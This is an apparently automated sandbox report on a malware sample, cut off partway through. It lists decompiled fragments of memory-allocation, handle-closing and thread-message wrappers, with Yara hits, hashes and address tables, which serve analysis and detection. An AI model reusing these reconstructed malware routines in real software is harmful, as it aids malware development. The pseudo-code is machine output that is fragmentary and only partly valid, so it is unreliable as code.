                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419F3B, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 79%
                                                			E00419F3B(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t15;
				void* _t22;

				asm("sbb [edx+edi*2+0x55], bl");
				_t11 = _a4;
				_t3 = _t11 + 0xc60; // 0xca0
				E0041A960(_t22, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}





                                                0x00419f3d
                                                0x00419f43
                                                0x00419f4f
                                                0x00419f57
                                                0x00419f79
                                                0x00419f7d

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: fe6b8a907076808e944212e22f765545b0788f538b6f03c9a2ed4e1ee3026a47
                                                • Instruction ID: 4ffe603f4016fbc21ed17f300f95f4eb974d244daf2ee2f018f5a58db0dd8ed6
                                                • Opcode Fuzzy Hash: fe6b8a907076808e944212e22f765545b0788f538b6f03c9a2ed4e1ee3026a47
                                                • Instruction Fuzzy Hash: 05F058B6200208ABCB14DF89CC81EE777A8AF8C614F158189FA08A7241C230E811CBE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                0x00419f4f
                                                0x00419f57
                                                0x00419f79
                                                0x00419f7d

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419E8A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00419E8A(void* __eax, intOrPtr _a4, void* _a8) {
				long _t11;
				void* _t15;

				_t8 = _a4;
				_t2 = _t8 + 0x10; // 0x300
				_t3 = _t8 + 0xc50; // 0x40a923
				E0041A960(_t15, _a4, _t3,  *_t2, 0, 0x2c);
				_t11 = NtClose(_a8); // executed
				return _t11;
			}





                                                0x00419e93
                                                0x00419e96
                                                0x00419e9f
                                                0x00419ea7
                                                0x00419eb5
                                                0x00419eb9

                                                APIs
                                                • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 1cf223d24ec8c2d59c3dc4b95d171e0186d941f099c4c533676dc744f878c66a
                                                • Instruction ID: 9ba7465aaca89f8ee684024cdd552b888b860dceca0564a18d6204a4d5c4d2a0
                                                • Opcode Fuzzy Hash: 1cf223d24ec8c2d59c3dc4b95d171e0186d941f099c4c533676dc744f878c66a
                                                • Instruction Fuzzy Hash: 4AE08C79200200AFD710DB94CC86EEB3B28EF44760F19449AFA685B242C130A5008BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                0x00419e93
                                                0x00419e96
                                                0x00419e9f
                                                0x00419ea7
                                                0x00419eb5
                                                0x00419eb9

                                                APIs
                                                • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C398F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 98e8ada1b738c65a87e888ac87cd0ccd4d6542254ae2b7a1278212f48a9cf3e8
                                                • Instruction ID: 881522aadd6711ea4e398cd44ab0b81fe0bdd89ca40ccaf424e27e19fe1951b0
                                                • Opcode Fuzzy Hash: 98e8ada1b738c65a87e888ac87cd0ccd4d6542254ae2b7a1278212f48a9cf3e8
                                                • Instruction Fuzzy Hash: FC9002A170100602D60171594444616010AA7D0381FA1C032A1024595ECA658992F171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 284801e0b298cdbe779faebab6d02d6cc1075f7a245305d991aec2c255d21e27
                                                • Instruction ID: 29b0f0f96c8be9f94088bd6a916e712121464ef1fd4c67342b74a87318c5a703
                                                • Opcode Fuzzy Hash: 284801e0b298cdbe779faebab6d02d6cc1075f7a245305d991aec2c255d21e27
                                                • Instruction Fuzzy Hash: 9D9002A1342042525A45B15944445074106B7E03817A1C022A1414990C85669856E661
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d3480169cfc767ef99e4073ae3f312bfa58e03b8bcb0e8b0350e827bfb8b88cb
                                                • Instruction ID: 3f57aaacccb033de03903bfc1ffd3a1de8dac44e103c8145c68cf5a88a74f7db
                                                • Opcode Fuzzy Hash: d3480169cfc767ef99e4073ae3f312bfa58e03b8bcb0e8b0350e827bfb8b88cb
                                                • Instruction Fuzzy Hash: 769002B130100513D611715945447070109A7D0381FA1C422A0424598D96968952F161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C399A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a53239547a86670d9d08cdabf23d518dd1ae1bf8de082f4f5e8b8ae668a99cc8
                                                • Instruction ID: e44664bcc361bb11f33a8e47f2eafe0f538d9d0a2c38286808775f65e9a250fb
                                                • Opcode Fuzzy Hash: a53239547a86670d9d08cdabf23d518dd1ae1bf8de082f4f5e8b8ae668a99cc8
                                                • Instruction Fuzzy Hash: DB9002E134100542D60071594454B060105E7E1341F61C025E1064594D8659CC52B166
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 95dc41244b408d48bf7f7cbc2a5ed782f00ec372db9035e287817a4c9803c5d9
                                                • Instruction ID: 8728b8ed00830760c47f68c70da82e58b381789f015defa5613dc977bf766f60
                                                • Opcode Fuzzy Hash: 95dc41244b408d48bf7f7cbc2a5ed782f00ec372db9035e287817a4c9803c5d9
                                                • Instruction Fuzzy Hash: 929002F130100502D640715944447460105A7D0341F61C021A5064594E86998DD5B6A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d51d7cc9c9592bcce54759bd25a2388e1b3ba47c853d602601b8516febf0eb3d
                                                • Instruction ID: 52a721f4cbf9b9983733422028dcf135700a1547e72247a6ceaa8de083ec583d
                                                • Opcode Fuzzy Hash: d51d7cc9c9592bcce54759bd25a2388e1b3ba47c853d602601b8516febf0eb3d
                                                • Instruction Fuzzy Hash: C99002A131180142D70075694C54B070105A7D0343F61C125A0154594CC9558861A561
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 39b0aebd0e667508606027b7eac41b63708b28c8965f83bf4d9bc5655cc1cfce
                                                • Instruction ID: 21d82464d75076ba7162c96ece0f5612f21ef72b42372d5c1bb4e56745a7d6e5
                                                • Opcode Fuzzy Hash: 39b0aebd0e667508606027b7eac41b63708b28c8965f83bf4d9bc5655cc1cfce
                                                • Instruction Fuzzy Hash: 679002B130140502D6007159485470B0105A7D0342F61C021A1164595D86658851B5B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 65fcc9ddf5a94b62a9d1d6c2cbc666da6209c391e926ab69f0ffbfdcded1db60
                                                • Instruction ID: 1840d73ea78bd10698860020dccf2a7f954efa31d12e33202fcfdd43af3ef4bb
                                                • Opcode Fuzzy Hash: 65fcc9ddf5a94b62a9d1d6c2cbc666da6209c391e926ab69f0ffbfdcded1db60
                                                • Instruction Fuzzy Hash: BB9002A1701001424640716988849064105BBE1351761C131A0998590D85998865A6A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C395D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 74456f9e610ae06b0274ce66537e3feeb3c79e43d93200a7e711bfd467da9577
                                                • Instruction ID: 1fe4b3c44eec5837bcd32dd5cb66f4b250af317e2cdc1c4bdd0d41a16b9a239c
                                                • Opcode Fuzzy Hash: 74456f9e610ae06b0274ce66537e3feeb3c79e43d93200a7e711bfd467da9577
                                                • Instruction Fuzzy Hash: E09002E130200103460571594454616410AA7E0341B61C031E10145D0DC5658891B165
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cd562e033a27ab0c12791c4d46a2129d5acb0af330fad7e45c4464a02e9cfa04
                                                • Instruction ID: 8659a0b7f650910f1b0b0459d50b00419039f0621c37fbfcd94526ea098d8148
                                                • Opcode Fuzzy Hash: cd562e033a27ab0c12791c4d46a2129d5acb0af330fad7e45c4464a02e9cfa04
                                                • Instruction Fuzzy Hash: 029002A5311001030605B55907445070146A7D5391361C031F1015590CD6618861A161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C396E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0f7e0eda3f0e4624eb60c73799ace71497c60d25ca9c75ea7f5de1ac910cbece
                                                • Instruction ID: 1cb853ac66436513d94be4e63b8ea37c25ab1dffbab41304d180ec1b438a3d0f
                                                • Opcode Fuzzy Hash: 0f7e0eda3f0e4624eb60c73799ace71497c60d25ca9c75ea7f5de1ac910cbece
                                                • Instruction Fuzzy Hash: CA9002B130108902D6107159844474A0105A7D0341F65C421A4424698D86D58891B161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: aaa82b9ade63b6130a1ab5186c5fbac715751ae0261c5e2c4229994cabde03d2
                                                • Instruction ID: f4617d92b85a356282afcfe0531de89e7895827d9644cfeb6d6a89a44ac83c22
                                                • Opcode Fuzzy Hash: aaa82b9ade63b6130a1ab5186c5fbac715751ae0261c5e2c4229994cabde03d2
                                                • Instruction Fuzzy Hash: E99002B130100902D6807159444464A0105A7D1341FA1C025A0025694DCA558A59B7E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 067a0980faeaba5c2061cdc6fe9001f19063c5f6440b8e77bc120528b148b90d
                                                • Instruction ID: b88b98c114b8c1d76d59eab8de6f40d0444bfea58d0265a75bf418cf0eb903b0
                                                • Opcode Fuzzy Hash: 067a0980faeaba5c2061cdc6fe9001f19063c5f6440b8e77bc120528b148b90d
                                                • Instruction Fuzzy Hash: C09002A931300102D6807159544860A0105A7D1342FA1D425A0015598CC9558869A361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C397A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a839225a15944f63578bb12a9814cca1c367e5ab352b2b139cb323dce23be145
                                                • Instruction ID: c045c8c54bebc589d3e2baf91b0d21a35e3452637702abae81e36b8967cc26d0
                                                • Opcode Fuzzy Hash: a839225a15944f63578bb12a9814cca1c367e5ab352b2b139cb323dce23be145
                                                • Instruction Fuzzy Hash: 729002A130100103D640715954586064105F7E1341F61D021E0414594CD9558856A262
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C39710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BD0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f7d589f10bebd204b5f5e65101ae7131c0f1a9cb799eef54303ed103280583bc
                                                • Instruction ID: ea2efc97115269524bacf356178c0763436aae833523edce62f28cb9e4d1cc66
                                                • Opcode Fuzzy Hash: f7d589f10bebd204b5f5e65101ae7131c0f1a9cb799eef54303ed103280583bc
                                                • Instruction Fuzzy Hash: CB9002B130100502D600759954486460105A7E0341F61D021A5024595EC6A58891B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                                • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 23%
                                                			E004082E8(void* __eax, void* __ecx, long _a8) {
				intOrPtr _v0;
				char _v71;
				char _v72;
				intOrPtr* _t15;
				int _t16;
				char* _t20;
				long _t25;
				void* _t29;
				int _t30;
				void* _t33;
				void* _t35;

				asm("fsubr qword [0xc992cc11]");
				_t33 = _t35;
				_v72 = 0;
				E0041B860( &_v71, 0, 0x3f);
				_t20 =  &_v72;
				E0041C400(_t20, 3);
				_t29 = _v0 + 0x1c;
				_t15 = E0040ACD0(_t29, _t29,  &_v72);
				 *_t15 =  *_t15 - _t15;
				 *((intOrPtr*)(_t15 - 0x2a)) =  *((intOrPtr*)(_t15 - 0x2a)) + _t20;
				asm("les ebp, [edx]");
				_push(0);
				_push(_t15);
				_push(_t29);
				_t16 = L00414E20();
				_t30 = _t16;
				if(_t30 != 0) {
					_t25 = _a8;
					_t16 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					_t43 = _t16;
					if(_t16 == 0) {
						_t16 =  *_t30(_t25, 0x8003, _t33 + (E0040A460(_t43, 1, 8) & 0x000000ff) - 0x40, _t16);
					}
				}
				return _t16;
			}














                                                0x004082e9
                                                0x004082f1
                                                0x004082ff
                                                0x00408303
                                                0x00408308
                                                0x0040830e
                                                0x0040831a
                                                0x0040831e
                                                0x00408320
                                                0x00408322
                                                0x00408327
                                                0x0040832a
                                                0x0040832c
                                                0x0040832d
                                                0x0040832e
                                                0x00408333
                                                0x0040833a
                                                0x0040833d
                                                0x0040834a
                                                0x0040834c
                                                0x0040834e
                                                0x0040836b
                                                0x0040836b
                                                0x0040836d
                                                0x00408372

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                Memory Dump Source
                                                • Source File: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: dc7c9b8ff7cf7bfd8f45c3dc27a9f24693a66079d45a4f27965ec2911998c338
                                                • Instruction ID: e8f78f9b746fdc70bbafdd547a47b53fe41318028a736c67dd0bb144aa5980b3
                                                • Opcode Fuzzy Hash: dc7c9b8ff7cf7bfd8f45c3dc27a9f24693a66079d45a4f27965ec2911998c338
                                                • Instruction Fuzzy Hash: 6D012431A802287AE720A6A59D43FFE372CAB40F15F04411EFF04FA1C1DBA9290646E9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 28%
                                                			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				intOrPtr* _t14;
				intOrPtr* _t15;
				int _t16;
				char* _t19;
				long _t24;
				void* _t27;
				intOrPtr* _t28;
				void* _t29;

				_v68 = 0;
				E0041B860( &_v67, 0, 0x3f);
				_t19 =  &_v68;
				E0041C400(_t19, 3);
				_t27 = _a4 + 0x1c;
				_t14 = E0040ACD0(_t27, _t27,  &_v68);
				 *_t14 =  *_t14 - _t14;
				 *((intOrPtr*)(_t14 - 0x2a)) =  *((intOrPtr*)(_t14 - 0x2a)) + _t19;
				asm("les ebp, [edx]");
				_push(0);
				_push(_t14);
				_push(_t27);
				_t15 = L00414E20();
				_t28 = _t15;
				if(_t28 != 0) {
					_t24 = _a8;
					_t16 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
					_t36 = _t16;
					if(_t16 == 0) {
						_t16 =  *_t28(_t24, 0x8003, _t29 + (E0040A460(_t36, 1, 8) & 0x000000ff) - 0x40, _t16);
					}
					return _t16;
				}
				return _t15;
			}













                                                0x004082ff
                                                0x00408303
                                                0x00408308
                                                0x0040830e
                                                0x0040831a
                                                0x0040831e
                                                0x00408320
                                                0x00408322
                                                0x00408327
                                                0x0040832a
                                                0x0040832c
                                                0x0040832d
                                                0x0040832e
                                                0x00408333
                                                0x0040833a
                                                0x0040833d
                                                0x0040834a
                                                0x0040834c
                                                0x0040834e
                                                0x0040836b
                                                0x0040836b
                                                0x00000000
                                                0x0040836d
                                                0x00408372

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                Memory Dump Source
                                                • Source File: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                                • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004082B6, Relevance: 1.5, APIs: 1, Instructions: 49threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                Memory Dump Source
                                                • Source File: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 8a1f0553f9aa59e503983324a55770187fdeb2aa4661b62cea9826e01f2a634e
                                                • Instruction ID: cf962fe462439d7b7fcbd575088aa3c3da4f462320113a969414827e79c109ef
                                                • Opcode Fuzzy Hash: 8a1f0553f9aa59e503983324a55770187fdeb2aa4661b62cea9826e01f2a634e
                                                • Instruction Fuzzy Hash: 6C01DB326402147AD7109AB5AC42FEA7358EB45B11F09416EFE04AB2C1E6B9984987E6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                0x0041a07f
                                                0x0041a087
                                                0x0041a09d
                                                0x0041a0a1

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                Memory Dump Source
                                                • Source File: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                0x0041a047
                                                0x0041a05d
                                                0x0041a061

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                Memory Dump Source
                                                • Source File: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
